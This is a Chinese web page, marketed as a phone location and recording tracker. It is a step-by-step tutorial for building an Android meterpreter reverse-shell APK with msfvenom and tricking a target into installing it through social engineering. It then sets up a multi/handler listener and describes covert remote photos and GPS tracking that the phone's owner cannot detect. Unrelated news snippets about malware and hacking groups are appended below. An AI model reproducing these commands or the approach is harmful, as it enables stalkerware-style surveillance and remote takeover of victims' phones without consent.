手机定位录音追踪器(放手机里的微型定位器)MsfvenomKali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msf
手机定位录音追踪器(放手机里的微型定位器)
Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。
比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的 *** 。
kali终端下输入:
msfvenom -h 查看使用帮助
其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)
msfvenom -l payload *** sfvenom -l formats
生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk
这里没有使用-f参数,生成安卓可执行程序,可以不用。
部署可执行程序
将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。
启动msf
Kali终端下输入:msfconsole
继续输入:
use exploit/multi/handler
本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。
为该模块设置参数:
show optionsset LHOST 192.168.31.111set lport 8888
这里的设置必须和前面用msfvenom的设置保持一致。
run执行侦听,等待上线
得到meterpreter会话
一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。
输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:
远程拍照:目标手机不会有任何察觉,属于后台系统拍照;
gps定位:直接显示经纬度地理位置,非常精准;
研究人员近日发现了针对乌克兰计算机的新型擦除恶意软件(以破坏关键文件和数据为目的),这是俄乌冲突以来发现的第 3 款擦除恶意软件。 这种被称为 CaddyWiper 的恶意软件是由总部位于斯洛伐克的网络安全公司 ESET 的研究人员发现的,他们在周一发布的推文中分享了细节。 据研究人员称,该...
Krebs On Security 周二警告称:黑客正越来越多地利用受感染的政府和警察部门的电子邮件账户,以从移动运营商、互联网服务提供商(ISP)和社交媒体公司榨取敏感的客户信息。周四,美国参议院内精通技术的议员之一表示,其对这份报告感到很是不安,并且已向科技企业和联邦机构发去询问,以了解此类活动...
Hackernews 编译,转载请注明出处: 从2021年6月,一个可能来自巴基斯坦的攻击者与一个针对感兴趣目标的后门攻击有关,该攻击使用了一种基于 windows 的远程访问木马,名为 CrimsonRAT。 Cisco Talos公司的研究人员在与The Hacker New...
一名安全研究人员发现了Cue Health公司家用COVID-19检测试剂盒的一个漏洞,可能会让用户伪造结果。Cue Health的COVID-19检测试剂盒是一种蓝牙操作的分子测试,可以在20分钟内检测出阳性标本。该系统使用鼻拭子测试冠状病毒,鼻拭子被插入一个一次性盒中,由电池供电的Cue阅读器进...
本周三,包括美国能源部(DOE)、网络安全和基础设施安全局(CISA)和联邦调查局(FBI)在内的多个机构,向关键基础设施运营商发出了严重的潜在攻击警报。近年来,某些持续威胁(APT)参与者创建了许多定制工具,并在针对工业控制系统(ICS)、监控和数据采集设备(SCADA)等关键基础设施的攻击事件中...
早在 5 月,微软就认定有俄罗斯背景的 NOBELIUM 黑客组织要对持续数月的 SolarWinds 网络攻击事件负责,并同企业、政府和执法机构达成了合作,以遏制此类网络攻击的负面影响。早些时候,微软更进一步地剖析了 NOBELIUM 使用的一套更加复杂的恶意软件传送方法。可知其用于造成破坏,并获...